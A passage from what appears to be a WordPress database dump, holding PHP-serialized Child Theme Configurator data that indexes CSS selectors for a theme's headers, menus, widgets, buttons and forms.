:\"11:669\";i:721;s:6:\"11:670\";i:722;s:6:\"11:671\";i:723;s:6:\"11:672\";i:724;s:6:\"11:673\";i:725;s:6:\"11:674\";i:726;s:6:\"11:675\";i:727;s:6:\"11:676\";i:728;s:6:\"11:677\";i:729;s:6:\"11:678\";i:730;s:6:\"11:679\";i:731;s:6:\"11:680\";i:732;s:6:\"11:681\";i:733;s:6:\"11:682\";i:734;s:6:\"11:683\";i:735;s:6:\"11:684\";i:736;s:6:\"11:685\";i:737;s:6:\"11:686\";i:738;s:6:\"11:687\";i:739;s:6:\"11:688\";i:740;s:6:\"11:689\";i:741;s:6:\"11:690\";i:742;s:6:\"11:691\";i:743;s:6:\"11:692\";i:744;s:6:\"11:693\";i:745;s:6:\"11:694\";i:746;s:6:\"11:695\";i:747;s:6:\"11:696\";i:748;s:6:\"11:697\";i:749;s:6:\"11:698\";i:750;s:6:\"11:699\";i:751;s:6:\"11:700\";i:752;s:6:\"11:701\";i:753;s:6:\"11:702\";i:754;s:6:\"11:703\";i:755;s:6:\"11:704\";i:756;s:6:\"11:705\";i:757;s:6:\"11:706\";i:758;s:6:\"11:707\";i:759;s:6:\"11:708\";i:760;s:6:\"11:709\";i:761;s:6:\"11:710\";i:762;s:6:\"11:711\";i:763;s:6:\"11:712\";i:764;s:6:\"11:713\";i:765;s:6:\"11:714\";i:766;s:6:\"11:715\";i:767;s:6:\"11:716\";i:768;s:6:\"11:717\";i:769;s:6:\"11:718\";i:770;s:6:\"11:719\";i:771;s:6:\"11:720\";i:772;s:6:\"11:721\";i:773;s:6:\"11:722\";i:774;s:6:\"11:723\";i:775;s:6:\"11:724\";i:776;s:6:\"11:725\";i:777;s:6:\"11:726\";i:778;s:6:\"11:727\";i:779;s:6:\"11:728\";i:780;s:6:\"11:729\";i:781;s:6:\"11:730\";i:782;s:6:\"11:731\";i:783;s:6:\"11:732\";i:784;s:6:\"11:733\";i:785;s:6:\"11:734\";i:786;s:6:\"11:735\";i:787;s:6:\"11:736\";i:788;s:6:\"11:737\";i:789;s:6:\"11:738\";i:790;s:6:\"11:739\";i:791;s:6:\"11:740\";i:792;s:6:\"11:741\";i:793;s:6:\"11:742\";i:794;s:6:\"11:533\";i:795;s:6:\"11:743\";i:796;s:6:\"11:744\";i:797;s:6:\"11:745\";i:798;s:6:\"11:746\";i:799;s:6:\"11:747\";i:800;s:6:\"11:748\";i:801;s:6:\"11:749\";i:802;s:6:\"11:750\";i:803;s:6:\"11:751\";i:804;s:6:\"11:752\";i:805;s:6:\"11:753\";i:806;s:6:\"11:754\";i:807;s:6:\"11:755\";i:808;s:6:\"11:756\";i:809;s:6:\"11:757\";i:810;s:6:\"11:758\";i:811;s:6:\"11:759\";i:812;s:6:\"11:760\";i:813;s:6:\"11:761\";i:814;s:6:\"11:762\";i:815;s:6:\"11:763\";i:816;s:6:\"11:764\";i:817;s:6:\"11:765\";i:818;s:6:\"11:766\";i:819;s:6:\"11:767\";i:820;s:6:\"11:768\";i:821;s:6:\"11:769\";}','no'),(9630,'chld_thm_cfg_options_dict_sel','a:769:{i:1;s:9:\".parallax\";i:2;s:26:\".roll-icon-list .list-item\";i:3;s:37:\".roll-project.fullwidth .project-item\";i:4;s:23:\".masonry-layout .hentry\";i:5;s:18:\".site-header.fixed\";i:6;s:25:\".roll-counter .numb-count\";i:7;s:22:\".header-wrap .col-md-8\";i:8;s:5:\".last\";i:9;s:21:\".margin-bottom-device\";i:10;s:18:\".margin-top-device\";i:11;s:44:\".content-area .post-wrap, .contact-form-wrap\";i:12;s:29:\".contact-form-aside, .sidebar\";i:13;s:14:\".roll-icon-box\";i:14;s:153:\".roll-promobox.aside-style, .roll-promobox.aside-style .promo-wrap, .roll-promobox.aside-style .promo-content, .roll-promobox.aside-style .promo-controls\";i:15;s:33:\".roll-promobox.aside-style .title\";i:16;s:23:\".footer-widgets .widget\";i:17;s:47:\".slides-container .slide-item, .panel-row-style\";i:18;s:26:\".panel-row-style.mob-pad-0\";i:19;s:27:\".panel-row-style.mob-pad-15\";i:20;s:27:\".panel-row-style.mob-pad-30\";i:21;s:27:\".panel-row-style.mob-pad-45\";i:22;s:8:\"#mainnav\";i:23;s:9:\".btn-menu\";i:24;s:12:\".site-header\";i:25;s:17:\".posts-navigation\";i:26;s:29:\".roll-client .client-item img\";i:27;s:16:\".panel-grid-cell\";i:28;s:2:\"h1\";i:29;s:2:\"h2\";i:30;s:2:\"h3\";i:31;s:2:\"h4\";i:32;s:2:\"h5\";i:33;s:2:\"h6\";i:34;s:13:\".posts-layout\";i:35;s:20:\".text-slider-section\";i:36;s:23:\".text-slider .maintitle\";i:37;s:22:\".text-slider .subtitle\";i:38;s:12:\".roll-button\";i:39;s:27:\".roll-project .project-item\";i:40;s:13:\".roll-counter\";i:41;s:40:\".single-post .author-post .author-avatar\";i:42;s:38:\".single-post .author-post .author-info\";i:43;s:36:\".single-post .author-post ul.socials\";i:44;s:32:\".single-post .author-post .intro\";i:45;s:23:\".comment-list .children\";i:46;s:25:\".error-wrap .error-search\";i:47;s:26:\".aside-image .content-wrap\";i:48;s:28:\".social-menu-widget a:before\";i:49;s:12:\".header-wrap\";i:50;s:13:\"#mainnav-mobi\";i:51;s:25:\".site-header.float-header\";i:52;s:11:\".site-title\";i:53;s:37:\".blog-post, .service, .sidebar-column\";i:54;s:12:\".text-slider\";i:55;s:30:\".header-wrap .container > .row\";i:56;s:19:\".social-menu-widget\";i:57;s:84:\".widget-area .widget_fp_social a, .social-menu-widget a, .social-menu-widget a:hover\";i:58;s:22:\".social-menu-widget li\";i:59;s:40:\".widget-area .widget_fp_social div ul li\";i:60;s:21:\".social-menu-widget a\";i:61;s:57:\".social-widget li a::before, .social-menu-widget a:before\";i:62;s:42:\".social-menu-widget li a, .social-widget a\";i:63;s:54:\".social-menu-widget li a:hover, .social-widget a:hover\";i:64;s:39:\".widget-area .widget_fp_social a:before\";i:65;s:50:\".social-menu-widget a[href*=\"twitter.com\"]::before\";i:66;s:51:\".social-menu-widget a[href*=\"facebook.com\"]::before\";i:67;s:54:\".social-menu-widget a[href*=\"plus.google.com\"]::before\";i:68;s:51:\".social-menu-widget a[href*=\"dribbble.com\"]::before\";i:69;s:52:\".social-menu-widget a[href*=\"pinterest.com\"]::before\";i:70;s:50:\".social-menu-widget a[href*=\"youtube.com\"]::before\";i:71;s:49:\".social-menu-widget a[href*=\"flickr.com\"]::before\";i:72;s:48:\".social-menu-widget a[href*=\"vimeo.com\"]::before\";i:73;s:52:\".social-menu-widget a[href*=\"instagram.com\"]::before\";i:74;s:51:\".social-menu-widget a[href*=\"linkedin.com\"]::before\";i:75;s:53:\".social-menu-widget a[href*=\"foursquare.com\"]::before\";i:76;s:49:\".social-menu-widget a[href*=\"tumblr.com\"]::before\";i:77;s:50:\".social-menu-widget a[href*=\"behance.net\"]::before\";i:78;s:53:\".social-menu-widget a[href*=\"deviantart.com\"]::before\";i:79;s:53:\".social-menu-widget a[href*=\"soundcloud.com\"]::before\";i:80;s:50:\".social-menu-widget a[href*=\"spotify.com\"]::before\";i:81;s:48:\".social-menu-widget a[href*=\"weibo.com\"]::before\";i:82;s:47:\".social-menu-widget a[href*=\"xing.com\"]::before\";i:83;s:49:\".social-menu-widget a[href*=\"trello.com\"]::before\";i:84;s:89:\".site-main .comment-navigation, .site-main .posts-navigation, .site-main .post-navigation\";i:85;s:98:\".comment-navigation .nav-previous, .posts-navigation .nav-previous, .post-navigation .nav-previous\";i:86;s:86:\".comment-navigation .nav-next, .posts-navigation .nav-next, .post-navigation .nav-next\";i:87;s:31:\".posts-navigation .nav-previous\";i:88;s:27:\".posts-navigation .nav-next\";i:89;s:16:\".post-navigation\";i:90;s:19:\".screen-reader-text\";i:91;s:80:\".screen-reader-text:hover, .screen-reader-text:active, .screen-reader-text:focus\";i:92;s:10:\".alignleft\";i:93;s:11:\".alignright\";i:94;s:12:\".aligncenter\";i:95;s:14:\".widget select\";i:96;s:29:\".widget_search .search-submit\";i:97;s:7:\".sticky\";i:98;s:7:\".hentry\";i:99;s:33:\".byline, .updated:not(.published)\";i:100;s:36:\".single .byline, .group-blog .byline\";i:101;s:42:\".single .entry-header, .page .entry-header\";i:102;s:13:\".entry-footer\";i:103;s:11:\".page-links\";i:104;s:12:\".page-header\";i:105;s:27:\".page-wrap .content-wrapper\";i:106;s:70:\".page .page-wrap .content-wrapper, .single .page-wrap .content-wrapper\";i:107;s:58:\".page-template-page_front-page .page-wrap .content-wrapper\";i:108;s:69:\".blog .format-aside .entry-title, .archive .format-aside .entry-title\";i:109;s:18:\".comment-content a\";i:110;s:13:\".bypostauthor\";i:111;s:77:\".infinite-scroll .posts-navigation, .infinite-scroll.neverending .site-footer\";i:112;s:38:\".infinity-end.neverending .site-footer\";i:113;s:80:\".page-content .wp-smiley, .entry-content .wp-smiley, .comment-content .wp-smiley\";i:114;s:21:\"embed, iframe, object\";i:115;s:3:\"img\";i:116;s:11:\".wp-caption\";i:117;s:35:\".wp-caption img[class*=\"wp-image-\"]\";i:118;s:16:\".wp-caption-text\";i:119;s:28:\".wp-caption .wp-caption-text\";i:120;s:8:\".gallery\";i:121;s:13:\".gallery-item\";i:122;s:32:\".gallery-columns-2 .gallery-item\";i:123;s:32:\".gallery-columns-3 .gallery-item\";i:124;s:32:\".gallery-columns-4 .gallery-item\";i:125;s:32:\".gallery-columns-5 .gallery-item\";i:126;s:32:\".gallery-columns-6 .gallery-item\";i:127;s:32:\".gallery-columns-7 .gallery-item\";i:128;s:32:\".gallery-columns-8 .gallery-item\";i:129;s:32:\".gallery-columns-9 .gallery-item\";i:130;s:16:\".gallery-caption\";i:131;s:4:\"body\";i:132;s:1:\"a\";i:133;s:16:\"a:hover, a:focus\";i:134;s:51:\".footer-widgets .widget ul, .widget-area .widget ul\";i:135;s:17:\".widget .children\";i:136;s:9:\".img-left\";i:137;s:10:\".img-right\";i:138;s:6:\"strong\";i:139;s:22:\"h1, h2, h3, h4, h5, h6\";i:140;s:11:\".text-white\";i:141;s:10:\".text-dark\";i:142;s:71:\"button, input[type=\"button\"], input[type=\"reset\"], input[type=\"submit\"]\";i:143;s:95:\"button:hover, input[type=\"button\"]:hover, input[type=\"reset\"]:hover, input[type=\"submit\"]:hover\";i:144;s:319:\"select, textarea, input[type=\"text\"], input[type=\"password\"], input[type=\"datetime\"], input[type=\"datetime-local\"], input[type=\"date\"], input[type=\"month\"], input[type=\"time\"], input[type=\"week\"], input[type=\"number\"], input[type=\"email\"], input[type=\"url\"], input[type=\"search\"], input[type=\"tel\"], input[type=\"color\"]\";i:145;s:401:\"textarea:focus, input[type=\"text\"]:focus, input[type=\"password\"]:focus, input[type=\"datetime\"]:focus, input[type=\"datetime-local\"]:focus, input[type=\"date\"]:focus, input[type=\"month\"]:focus, input[type=\"time\"]:focus, input[type=\"week\"]:focus, input[type=\"number\"]:focus, input[type=\"email\"]:focus, input[type=\"url\"]:focus, input[type=\"search\"]:focus, input[type=\"tel\"]:focus, input[type=\"color\"]:focus\";i:146;s:8:\"textarea\";i:147;s:22:\"input[type=\"checkbox\"]\";i:148;s:102:\"input:-moz-placeholder, textarea:-moz-placeholder, input::-moz-placeholder, textarea::-moz-placeholder\";i:149;s:59:\"input:-ms-input-placeholder, textarea:-ms-input-placeholder\";i:150;s:69:\"input::-webkit-input-placeholder, textarea::-webkit-input-placeholder\";i:151;s:17:\".orches-animation\";i:152;s:26:\".orches-animation.animated\";i:153;s:4:\".btn\";i:154;s:464:\"textarea, input[type=\"text\"], input[type=\"submit\"], input[type=\"password\"], input[type=\"datetime\"], input[type=\"datetime-local\"], input[type=\"date\"], input[type=\"month\"], input[type=\"time\"], input[type=\"week\"], input[type=\"number\"], input[type=\"email\"], input[type=\"url\"], input[type=\"search\"], input[type=\"tel\"], input[type=\"color\"], .uneditable-input, .dropdown-menu, .navbar .nav > .active > a, .navbar .nav > .active > a:hover, .navbar .nav > .active > a:focus\";i:155;s:5:\"table\";i:156;s:6:\"th, td\";i:157;s:34:\".site-title a, .site-title a:hover\";i:158;s:10:\".site-logo\";i:159;s:61:\".admin-bar .site-header, .admin-bar .site-header.float-header\";i:160;s:13:\".header-image\";i:161;s:13:\".header-inner\";i:162;s:17:\".site-description\";i:163;s:23:\".site-description:empty\";i:164;s:46:\".site-header .col-md-4, .site-header .col-md-8\";i:165;s:18:\".site-header .logo\";i:166;s:20:\".site-header .logo a\";i:167;s:34:\".site-header.float-header #mainnav\";i:168;s:48:\".site-header.float-header #mainnav > ul > li > a\";i:169;s:31:\".site-header.float-header .logo\";i:170;s:11:\"#mainnav ul\";i:171;s:11:\"#mainnav li\";i:172;s:17:\"#mainnav ul ul li\";i:173;s:16:\"#mainnav ul li a\";i:174;s:22:\"#mainnav ul li a:hover\";i:175;s:16:\"#mainnav ul ul a\";i:176;s:29:\"#mainnav > ul > li:last-child\";i:177;s:14:\"#mainnav ul li\";i:178;s:17:\"#mainnav ul li ul\";i:179;s:20:\"#mainnav ul li ul ul\";i:180;s:23:\"#mainnav ul li ul:after\";i:181;s:26:\"#mainnav ul li ul ul:after\";i:182;s:23:\"#mainnav ul li ul li ul\";i:183;s:22:\"#mainnav li:hover > ul\";i:184;s:25:\"#mainnav li:hover > ul ul\";i:185;s:18:\"#mainnav .sub-menu\";i:186;s:23:\"#mainnav .sub-menu li a\";i:187;s:31:\"#mainnav .sub-menu li:hover > a\";i:188;s:38:\"#mainnav li:hover > .sub-menu > li > a\";i:189;s:22:\"#mainnav ul li::before\";i:190;s:28:\"#mainnav .sub-menu li:before\";i:191;s:21:\"#mainnav-mobi ul li a\";i:192;s:27:\"#mainnav-mobi ul li::before\";i:193;s:16:\"#mainnav-mobi ul\";i:194;s:19:\"#mainnav-mobi ul li\";i:195;s:25:\"#mainnav-mobi ul > li > a\";i:196;s:25:\"#mainnav-mobi ul.sub-menu\";i:197;s:78:\"#mainnav-mobi > ul > li > ul > li, #mainnav-mobi > ul > li > ul > li > ul > li\";i:198;s:38:\"#mainnav-mobi > ul > li > ul > li >  a\";i:199;s:45:\"#mainnav-mobi > ul > li > ul > li > ul > li a\";i:200;s:34:\"#mainnav-mobi ul.sub-menu > li > a\";i:201;s:47:\"#mainnav-mobi > ul > li > ul > li:first-child a\";i:202;s:86:\"#mainnav-mobi ul.sub-menu > li > a:hover, #mainnav-mobi > ul > li > ul > li.active > a\";i:203;s:16:\".btn-menu:before\";i:204;s:12:\".btn-submenu\";i:205;s:19:\".btn-submenu:before\";i:206;s:26:\".btn-submenu.active:before\";i:207;s:12:\".aside-image\";i:208;s:29:\".aside-image .image-container\";i:209;s:26:\".aside-image .image-holder\";i:210;s:35:\".aside-image.right .image-container\";i:211;s:32:\".aside-image.right .content-wrap\";i:212;s:14:\".error-wrap h1\";i:213;s:14:\".error-wrap h5\";i:214;s:24:\".error-wrap #search-form\";i:215;s:25:\".error-wrap .search-input\";i:216;s:26:\".error-wrap #search-submit\";i:217;s:32:\".error-wrap #search-submit:hover\";i:218;s:12:\"#page-slider\";i:219;s:8:\".overlay\";i:220;s:10:\".page-wrap\";i:221;s:41:\".page-template-page_front-page .page-wrap\";i:222;s:28:\".entry-page p, .entry-post p\";i:223;s:15:\".entry-post img\";i:224;s:28:\".header-slider, .owl-wrapper\";i:225;s:29:\".header-slider, .owl-carousel\";i:226;s:14:\".header-slider\";i:227;s:18:\".slide-text.slides\";i:228;s:29:\".slides-container .slide-item\";i:229;s:10:\".sliderFix\";i:230;s:47:\".text-slider .maintitle, .text-slider .subtitle\";i:231;s:29:\".text-slider .maintitle:after\";i:232;s:4:\"from\";i:233;s:2:\"to\";i:234;s:12:\".slide-inner\";i:235;s:11:\".page-title\";i:236;s:21:\".page-title .col-md-6\";i:237;s:17:\".page-title-inner\";i:238;s:15:\".page-title-cap\";i:239;s:24:\".page-title .breadcrumbs\";i:240;s:14:\".page-title h1\";i:241;s:15:\".breadcrumbs ul\";i:242;s:18:\".breadcrumbs ul li\";i:243;s:26:\".breadcrumbs ul li a:hover\";i:244;s:21:\".content-area .hentry\";i:245;s:33:\".content-area .hentry:first-child\";i:246;s:27:\".content-area .hentry:after\";i:247;s:39:\".content-area .hentry:first-child:after\";i:248;s:21:\".hentry .post-content\";i:249;s:26:\".content-area .entry-thumb\";i:250;s:19:\".hentry .title-post\";i:251;s:18:\".hentry .meta-post\";i:252;s:40:\".hentry .meta-post, .hentry .meta-post a\";i:253;s:23:\".hentry .meta-post span\";i:254;s:29:\".hentry .meta-post .cat-links\";i:255;s:30:\".hentry .meta-post span:before\";i:256;s:40:\".hentry .meta-post span.posted-on:before\";i:257;s:37:\".hentry .meta-post span.byline:before\";i:258;s:44:\".hentry .meta-post span.comments-link:before\";i:259;s:40:\".hentry .meta-post span.cat-links:before\";i:260;s:17:\"span.author.vcard\";i:261;s:18:\".hentry blockquote\";i:262;s:10:\".fullwidth\";i:263;s:10:\".error-404\";i:264;s:26:\".error-404 .page-content p\";i:265;s:15:\".masonry-layout\";i:266;s:26:\".masonry-layout .post-wrap\";i:267;s:29:\".masonry-layout .hentry:after\";i:268;s:19:\".blog-pagination ul\";i:269;s:48:\".blog-pagination ul li, .blog-pagination ul li a\";i:270;s:22:\".blog-pagination ul li\";i:271;s:61:\".blog-pagination ul li.active, .blog-pagination ul li:hover a\";i:272;s:20:\".widget-area .widget\";i:273;s:27:\".widget-area .widget:before\";i:274;s:32:\".widget-area .widget:first-child\";i:275;s:39:\".widget-area .widget:first-child:before\";i:276;s:26:\".widget-area .widget-title\";i:277;s:26:\".widget-area .widget ul li\";i:278;s:38:\".widget-area .widget ul li:first-child\";i:279;s:37:\".widget-area .widget ul li:last-child\";i:280;s:29:\".widget-area, .widget-area  a\";i:281;s:33:\".widget-popular-post .news .thumb\";i:282;s:32:\".widget-popular-post .news .text\";i:283;s:29:\".widget-popular-post .news h6\";i:284;s:60:\".widget-popular-post .news p, .widget-popular-post .news p a\";i:285;s:36:\".widget-popular-post .news p a:hover\";i:286;s:35:\".widget-categories .categories li a\";i:287;s:38:\".widget-categories .categories li span\";i:288;s:24:\".widget-tags .tag-list a\";i:289;s:30:\".widget-tags .tag-list a:hover\";i:290;s:20:\".single-post .hentry\";i:291;s:25:\".single-post .author-post\";i:292;s:31:\".single-post .author-post .name\";i:293;s:34:\".single-post .author-post .name h6\";i:294;s:39:\".single-post .author-post ul.socials li\";i:295;s:41:\".single-post .author-post ul.socials li a\";i:296;s:14:\".comments-area\";i:297;s:15:\".comments-title\";i:298;s:17:\".comments-area ol\";i:299;s:24:\".comments-area .children\";i:300;s:18:\".comments-area .fn\";i:301;s:23:\".comment-author .avatar\";i:302;s:38:\".comment-author .fn, .comment-metadata\";i:303;s:17:\".comment-metadata\";i:304;s:13:\".comment-body\";i:305;s:6:\".reply\";i:306;s:19:\".comment-reply-link\";i:307;s:15:\".comment-meta a\";i:308;s:20:\".comments-area a.url\";i:309;s:20:\".comment-reply-title\";i:310;s:19:\".comment-form input\";i:311;s:18:\".form-submit input\";i:312;s:17:\".portfolio-images\";i:313;s:15:\".portfolio-info\";i:314;s:18:\".portfolio-info h5\";i:315;s:18:\".portfolio-info ul\";i:316;s:21:\".portfolio-info ul li\";i:317;s:26:\".portfolio-info ul li span\";i:318;s:29:\".portfolio-info .button-group\";i:319;s:31:\".portfolio-info .button-group a\";i:320;s:15:\".footer-widgets\";i:321;s:14:\".footer .copyr\";i:322;s:29:\".footer-widgets .widget-title\";i:323;s:25:\".widget-info .logo-footer\";i:324;s:14:\".widget-info p\";i:325;s:24:\".widget-info .infomation\";i:326;s:27:\".widget-info .infomation li\";i:327;s:126:\".widget-info .infomation li.address:before, .widget-info .infomation li.phone:before, .widget-info .infomation li.email:before\";i:328;s:40:\".widget-info .infomation li.phone:before\";i:329;s:40:\".widget-info .infomation li.email:before\";i:330;s:16:\".widget-links ul\";i:331;s:19:\".widget-links ul li\";i:332;s:31:\".widget-links ul li:first-child\";i:333;s:24:\".widget-mail-subscribe p\";i:334;s:39:\".widget-mail-subscribe .email-sub input\";i:335;s:12:\".site-footer\";i:336;s:28:\".site-footer, .site-footer a\";i:337;s:21:\".site-footer .socials\";i:338;s:19:\".bottom .socials li\";i:339;s:26:\".site-footer .socials li a\";i:340;s:32:\".site-footer .socials li:hover a\";i:341;s:10:\".preloader\";i:342;s:19:\".preloader .spinner\";i:343;s:48:\".preloader .pre-bounce1, .preloader .pre-bounce2\";i:344;s:23:\".preloader .pre-bounce2\";i:345;s:7:\".go-top\";i:346;s:13:\".go-top:hover\";i:347;s:12:\".go-top.show\";i:348;s:30:\".panel-grid-cell .widget-title\";i:349;s:36:\".panel-grid-cell .widget-title:after\";i:350;s:11:\".panel-grid\";i:351;s:36:\".panel-row-style[data-hasbg=\"hasbg\"]\";i:352;s:20:\".panel-grid .overlay\";i:353;s:32:\".no-col-padding .panel-grid-cell\";i:354;s:15:\".roll-counter i\";i:355;s:52:\".roll-counter .name-count, .roll-counter .numb-count\";i:356;s:25:\".roll-counter .name-count\";i:357;s:12:\".roll-client\";i:358;s:25:\".roll-client .client-item\";i:359;s:12:\".roll-spacer\";i:360;s:18:\".roll-spacer.small\";i:361;s:18:\".roll-spacer.large\";i:362;s:8:\".service\";i:363;s:39:\".widget_sydney_services_type_b .service\";i:364;s:45:\".widget_sydney_services_type_b .service-thumb\";i:365;s:35:\".service.col-md-4:nth-of-type(3n+1)\";i:366;s:35:\".service.col-md-6:nth-of-type(2n+1)\";i:367;s:29:\".roll-icon-box .service-thumb\";i:368;s:20:\".roll-icon-box .icon\";i:369;s:19:\".roll-icon-box.left\";i:370;s:25:\".roll-icon-box.left .icon\";i:371;s:22:\".roll-icon-box .icon i\";i:372;s:23:\".roll-icon-box .content\";i:373;s:26:\".roll-icon-box .content h3\";i:374;s:56:\".roll-icon-box .content h3, .roll-icon-box .content h3 a\";i:375;s:25:\".roll-icon-box .content p\";i:376;s:32:\".sydney_contact_info_widget span\";i:377;s:31:\".sydney_contact_info_widget div\";i:378;s:15:\".roll-icon-list\";i:379;s:21:\".roll-icon-list .icon\";i:380;s:23:\".roll-icon-list .icon i\";i:381;s:24:\".roll-icon-list .content\";i:382;s:27:\".roll-icon-list .content h3\";i:383;s:29:\".roll-icon-list .content h3 a\";i:384;s:26:\".roll-icon-list .content p\";i:385;s:10:\".roll-list\";i:386;s:13:\".roll-list li\";i:387;s:20:\".roll-list li:before\";i:388;s:18:\".roll-button:hover\";i:389;s:19:\".roll-button.border\";i:390;s:25:\".roll-button.border:hover\";i:391;s:30:\".roll-button.border.text-white\";i:392;s:18:\".roll-button.light\";i:393;s:24:\".roll-button.light:hover\";i:394;s:25:\".roll-button.light.border\";i:395;s:31:\".roll-button.light.border:hover\";i:396;s:17:\".roll-button.dark\";i:397;s:23:\".roll-button.dark:hover\";i:398;s:24:\".roll-button.dark.border\";i:399;s:30:\".roll-button.dark.border:hover\";i:400;s:12:\".more-button\";i:401;s:18:\".roll-button-group\";i:402;s:31:\".roll-button-group .roll-button\";i:403;s:43:\".roll-button-group .roll-button:first-child\";i:404;s:10:\".blog-post\";i:405;s:23:\".blog-post .entry-title\";i:406;s:15:\".project-filter\";i:407;s:18:\".project-filter li\";i:408;s:39:\".widget-area .widget .project-filter li\";i:409;s:20:\".project-filter li a\";i:410;s:134:\".project-filter li a.active, .project-filter li a:hover, #secondary .project-filter li a.active, #secondary .project-filter li a:hover\";i:411;s:13:\".roll-project\";i:412;s:38:\".roll-project .project-item .item-wrap\";i:413;s:40:\".roll-project .project-item .pop-overlay\";i:414;s:45:\".roll-project .project-item .project-pop-wrap\";i:415;s:40:\".roll-project .project-item .project-pop\";i:416;s:42:\".roll-project .project-item .project-pop a\";i:417;s:46:\".roll-project .project-item:hover .project-pop\";i:418;s:43:\".roll-project .project-item .project-pop h3\";i:419;s:40:\".roll-project .project-item .project-cat\";i:420;s:43:\".roll-project .project-item .project-cat li\";i:421;s:45:\".roll-project .project-item .project-cat li a\";i:422;s:52:\".roll-project .project-item .project-cat li a:before\";i:423;s:64:\".roll-project .project-item .project-cat li:first-child a:before\";i:424;s:114:\".roll-project .project-item:hover .project-title-wrap, .roll-project .project-item:hover > .item-wrap .project-pop\";i:425;s:59:\".roll-project .project-item:hover > .item-wrap .pop-overlay\";i:426;s:19:\".project-title-wrap\";i:427;s:66:\".roll-project .project-item:hover > .item-wrap .project-title-wrap\";i:428;s:28:\".roll-project .project-title\";i:429;s:33:\".roll-project .project-title span\";i:430;s:18:\".roll-testimonials\";i:431;s:26:\".roll-testimonials .avatar\";i:432;s:58:\".roll-testimonials .avatar, .roll-testimonials .avatar img\";i:433;s:27:\".roll-testimonials .whisper\";i:434;s:24:\".roll-testimonials .name\";i:435;s:29:\".roll-testimonials .name span\";i:436;s:32:\".roll-testimonials .owl-controls\";i:437;s:37:\".hentry .roll-testimonials blockquote\";i:438;s:32:\".owl-carousel .owl-wrapper:after\";i:439;s:13:\".owl-carousel\";i:440;s:26:\".owl-carousel .owl-wrapper\";i:441;s:32:\".owl-carousel .owl-wrapper-outer\";i:442;s:43:\".owl-carousel .owl-wrapper-outer.autoHeight\";i:443;s:23:\".owl-carousel .owl-item\";i:444;s:55:\".owl-controls .owl-page, .owl-controls .owl-buttons div\";i:445;s:13:\".owl-controls\";i:446;s:53:\".owl-carousel  .owl-wrapper, .owl-carousel  .owl-item\";i:447;s:24:\".owl-theme .owl-controls\";i:448;s:34:\".owl-theme .owl-controls .owl-page\";i:449;s:39:\".owl-theme .owl-controls .owl-page span\";i:450;s:16:\".roll-socials li\";i:451;s:27:\".roll-socials li:last-child\";i:452;s:18:\".roll-socials li a\";i:453;s:24:\".roll-socials li a:hover\";i:454;s:16:\".roll-infomation\";i:455;s:19:\".roll-infomation li\";i:456;s:29:\".roll-infomation li.time span\";i:457;s:102:\".roll-infomation li.address:before, .roll-infomation li.phone:before, .roll-infomation li.email:before\";i:458;s:32:\".roll-infomation li.phone:before\";i:459;s:32:\".roll-infomation li.email:before\";i:460;s:14:\".roll-progress\";i:461;s:20:\".roll-progress .name\";i:462;s:42:\".roll-progress .name, .roll-progress .perc\";i:463;s:32:\".roll-progress .progress-animate\";i:464;s:28:\".roll-progress .progress-bar\";i:465;s:20:\".roll-progress .perc\";i:466;s:25:\".roll-progress .perc.show\";i:467;s:36:\".roll-servicebox .service-content h3\";i:468;s:10:\".roll-tabs\";i:469;s:20:\".roll-tabs .menu-tab\";i:470;s:23:\".roll-tabs .menu-tab li\";i:471;s:25:\".roll-tabs .menu-tab li a\";i:472;s:31:\".roll-tabs .menu-tab li a:hover\";i:473;s:32:\".roll-tabs .menu-tab li.active a\";i:474;s:23:\".roll-tabs .content-tab\";i:475;s:25:\".roll-tabs .content-tab p\";i:476;s:14:\".roll-promobox\";i:477;s:30:\".roll-promobox .promo-controls\";i:478;s:21:\".roll-promobox .title\";i:479;s:31:\".roll-promobox .promo-content p\";i:480;s:26:\".roll-promobox.aside-style\";i:481;s:43:\".roll-promobox.aside-style .promo-content p\";i:482;s:38:\".roll-promobox.aside-style .promo-wrap\";i:483;s:41:\".roll-promobox.aside-style .promo-content\";i:484;s:42:\".roll-promobox.aside-style .promo-controls\";i:485;s:30:\".roll-team.carousel .team-item\";i:486;s:39:\".post-type-archive-employees .team-item\";i:487;s:22:\".roll-team .team-inner\";i:488;s:37:\".roll-team .team-item .team-pop .name\";i:489;s:36:\".roll-team .team-item .team-pop .pos\";i:490;s:42:\".roll-team .team-item .team-pop .team-info\";i:491;s:34:\".roll-team .team-item .pop-overlay\";i:492;s:34:\".roll-team .team-item .team-social\";i:493;s:37:\".roll-team .team-item .team-social li\";i:494;s:28:\".roll-team .team-social li a\";i:495;s:51:\".roll-team .team-item .team-social li:first-child a\";i:496;s:45:\".roll-team .team-item .team-social li:hover a\";i:497;s:26:\".archive .team-social li a\";i:498;s:31:\".roll-team .team-item .team-pop\";i:499;s:51:\".roll-team .team-item:hover > .team-inner .team-pop\";i:500;s:54:\".roll-team .team-item:hover > .team-inner .pop-overlay\";i:501;s:24:\".roll-team .team-content\";i:502;s:30:\".roll-team .team-content .name\";i:503;s:29:\".roll-team .team-content .pos\";i:504;s:37:\".archive .team-item:nth-of-type(3n+1)\";i:505;s:34:\"h1 a, h2 a, h3 a, h4 a, h5 a, h6 a\";i:506;s:11:\".text-color\";i:507;s:59:\"#mainnav > ul > li > a.active, #mainnav > ul > li > a:hover\";i:508;s:26:\".hentry .meta-post a:hover\";i:509;s:23:\".sidebar .widget:before\";i:510;s:24:\".comment .comment-detail\";i:511;s:36:\".bottom .socials li:hover a, .go-top\";i:512;s:42:\".switcher-container .switcher-icon a:focus\";i:513;s:103:\".owl-theme .owl-controls .owl-page.active span, .owl-theme .owl-controls.clickable .owl-page:hover span\";i:514;s:58:\".roll-icon-box .icon i, .roll-icon-box .content h3 a:hover\";i:515;s:26:\".roll-icon-box.white .icon\";i:516;s:34:\".roll-icon-box.white .content h3 a\";i:517;s:60:\".roll-icon-list .icon i, .roll-icon-list .content h3 a:hover\";i:518;s:55:\".project-filter li a.active, .project-filter li a:hover\";i:519;s:55:\".roll-team .team-item .team-pop .team-social li:hover a\";i:520;s:12:\"a, a:visited\";i:521;s:13:\"a[href]:after\";i:522;s:17:\"abbr[title]:after\";i:523;s:48:\"a[href^=\"javascript:\"]:after, a[href^=\"#\"]:after\";i:524;s:15:\"blockquote, pre\";i:525;s:5:\"thead\";i:526;s:7:\"img, tr\";i:527;s:9:\"h2, h3, p\";i:528;s:6:\"h2, h3\";i:529;s:6:\"select\";i:530;s:7:\".navbar\";i:531;s:32:\".btn>.caret, .dropup>.btn>.caret\";i:532;s:6:\".label\";i:533;s:6:\".table\";i:534;s:20:\".table td, .table th\";i:535;s:38:\".table-bordered td, 